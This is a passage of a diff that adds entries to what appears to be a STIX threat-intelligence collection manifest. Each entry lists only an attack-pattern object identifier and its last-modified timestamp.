"object_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "object_modified": "2024-01-16T22:47:59.395Z" + }, + { + "object_ref": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", + "object_modified": "2024-03-24T19:41:54.832Z" + }, + { + "object_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "object_modified": "2024-02-28T14:35:00.862Z" + }, + { + "object_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "object_modified": "2023-10-13T17:57:07.653Z" + }, + { + "object_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "object_modified": "2024-04-12T03:46:49.507Z" + }, + { + "object_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", + "object_modified": "2024-01-10T17:55:46.905Z" + }, + { + "object_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "object_modified": "2023-10-13T17:57:07.840Z" + }, + { + "object_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--8df54627-376c-487c-a09c-7d2b5620f56e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "object_modified": "2023-10-13T17:57:08.037Z" + }, + { + "object_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "object_modified": "2024-04-16T12:43:55.369Z" + }, + { + "object_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "object_modified": "2024-04-13T14:08:20.882Z" + }, + { + "object_ref": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5", + "object_modified": "2022-10-25T15:49:14.785Z" + }, + { + "object_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "object_modified": "2024-04-12T03:40:37.954Z" + }, + { + "object_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "object_modified": "2023-10-15T11:10:03.428Z" + }, + { + "object_ref": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "object_modified": "2024-04-19T04:26:29.365Z" + }, + { + "object_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "object_modified": "2024-04-16T13:03:40.824Z" + }, + { + "object_ref": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", + "object_modified": "2023-04-11T00:34:00.779Z" + }, + { + "object_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "object_modified": "2024-03-01T18:01:37.575Z" + }, + { + "object_ref": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "object_modified": "2023-10-13T17:57:08.233Z" + }, + { + "object_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "object_modified": "2024-01-18T17:23:22.591Z" + }, + { + "object_ref": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "object_modified": "2023-10-15T11:45:21.555Z" + }, + { + "object_ref": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "object_modified": "2024-02-16T13:09:39.215Z" + }, + { + "object_ref": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "object_modified": "2023-10-16T09:08:22.319Z" + }, + { + "object_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "object_modified": "2023-10-13T17:57:08.425Z" + }, + { + "object_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", + "object_modified": "2024-03-28T16:14:28.678Z" + }, + { + "object_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a0a189c8-d3bd-4991-bf6f-153d185ee373", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "object_modified": "2022-10-18T22:48:33.286Z" + }, + { + "object_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "object_modified": "2024-01-16T22:24:38.234Z" + }, + { + "object_ref": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "object_modified": "2024-04-15T23:39:31.474Z" + }, + { + "object_ref": "attack-pattern--a257ed11-ff3b-4216-8c9d-3938ef57064c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "object_modified": "2021-10-17T16:17:55.499Z" + }, + { + "object_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "object_modified": "2023-09-08T11:56:26.862Z" + }, + { + "object_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "object_modified": "2024-03-01T16:56:32.245Z" + }, + { + "object_ref": "attack-pattern--a6525aec-acc4-47fe-92f9-b9b4de4b9228", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "object_modified": "2023-10-18T16:31:56.936Z" + }, + { + "object_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "object_modified": "2024-04-19T13:24:36.872Z" + }, + { + "object_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "object_modified": "2023-10-13T17:57:08.613Z" + }, + { + "object_ref": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "object_modified": "2024-01-29T18:53:26.593Z" + }, + { + "object_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "object_modified": "2024-04-16T12:24:40.163Z" + }, + { + "object_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--aa8bfbc9-78dc-41a4-a03b-7453e0fdccda", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "object_modified": "2024-05-13T23:56:48.161Z" + }, + { + "object_ref": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "object_modified": "2024-04-12T21:13:46.640Z" + }, + { + "object_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "object_modified": "2024-02-02T17:18:39.004Z" + }, + { + "object_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "object_modified": "2024-02-02T19:04:35.389Z" + }, + { + "object_ref": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "object_modified": "2023-08-11T21:06:07.690Z" + }, + { + "object_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "object_modified": "2023-04-12T20:19:21.620Z" + }, + { + "object_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "object_modified": "2023-11-21T20:02:33.404Z" + }, + { + "object_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "object_modified": "2023-10-13T17:57:08.992Z" + }, + { + "object_ref": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", + "object_modified": "2024-04-16T12:35:38.832Z" + }, + { + "object_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "object_modified": "2023-10-13T17:57:09.193Z" + }, + { + "object_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b2001907-166b-4d71-bb3c-9d26c871de09", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "object_modified": "2023-08-11T21:37:00.009Z" + }, + { + "object_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "object_modified": "2024-03-07T14:28:02.910Z" + }, + { + "object_ref": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "object_modified": "2024-04-16T12:27:18.945Z" + }, + { + "object_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "object_modified": "2024-04-16T00:20:21.488Z" + }, + { + "object_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "object_modified": "2023-05-31T12:34:03.420Z" + }, + { + "object_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "object_modified": "2023-10-13T17:57:09.388Z" + }, + { + "object_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "object_modified": "2023-10-13T17:57:09.581Z" + }, + { + "object_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "object_modified": "2024-03-01T15:49:15.588Z" + }, + { + "object_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "object_modified": "2023-08-14T19:30:45.123Z" + }, + { + "object_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "object_modified": "2023-10-13T17:57:09.780Z" + }, + { + "object_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b82f7d37-b826-4ec9-9391-8e121c78aed7", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "object_modified": "2024-03-01T17:17:37.292Z" + }, + { + "object_ref": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "object_modified": "2024-04-16T12:29:47.903Z" + }, + { + "object_ref": "attack-pattern--b8c5c9dd-a662-479d-9428-ae745872537c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "object_modified": "2023-10-13T17:57:09.988Z" + }, + { + "object_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "object_modified": "2023-05-04T18:00:33.023Z" + }, + { + "object_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "object_modified": "2023-10-13T17:57:10.181Z" + }, + { + "object_ref": "attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "object_modified": "2023-10-15T11:49:40.990Z" + }, + { + "object_ref": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", + "object_modified": "2023-04-14T23:29:10.396Z" + }, + { + "object_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "object_modified": "2023-09-14T21:12:48.411Z" + }, + { + "object_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "object_modified": "2023-10-13T17:57:10.374Z" + }, + { + "object_ref": "attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "object_modified": "2023-04-12T22:46:33.995Z" + }, + { + "object_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "object_modified": "2023-12-26T20:59:21.941Z" + }, + { + "object_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "object_modified": "2023-09-15T19:11:47.547Z" + }, + { + "object_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "object_modified": "2023-10-01T13:48:28.738Z" + }, + { + "object_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "object_modified": "2023-09-29T21:07:31.570Z" + }, + { + "object_ref": "attack-pattern--c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "object_modified": "2023-10-13T17:57:10.581Z" + }, + { + "object_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "object_modified": "2023-03-30T21:01:48.815Z" + }, + { + "object_ref": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "object_modified": "2023-09-19T21:26:24.725Z" + }, + { + "object_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "object_modified": "2023-08-14T14:55:07.432Z" + }, + { + "object_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02", + "object_modified": "2021-01-27T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "object_modified": "2023-10-13T17:57:10.768Z" + }, + { + "object_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "object_modified": "2024-01-04T20:01:27.662Z" + }, + { + "object_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", + "object_modified": "2023-08-14T19:23:58.317Z" + }, + { + "object_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "object_modified": "2023-10-13T17:57:10.962Z" + }, + { + "object_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "object_modified": "2023-09-30T19:45:05.886Z" + }, + { + "object_ref": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", + "object_modified": "2023-10-02T22:17:54.968Z" + }, + { + "object_ref": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "object_modified": "2023-03-30T21:01:52.356Z" + }, + { + "object_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "object_modified": "2024-04-12T21:13:56.431Z" + }, + { + "object_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "object_modified": "2024-04-16T00:15:53.303Z" + }, + { + "object_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "object_modified": "2024-04-13T14:28:20.651Z" + }, + { + "object_ref": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "object_modified": "2024-01-30T18:35:58.021Z" + }, + { + "object_ref": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "object_modified": "2023-04-21T12:20:20.711Z" + }, + { + "object_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "object_modified": "2023-09-08T20:28:49.600Z" + }, + { + 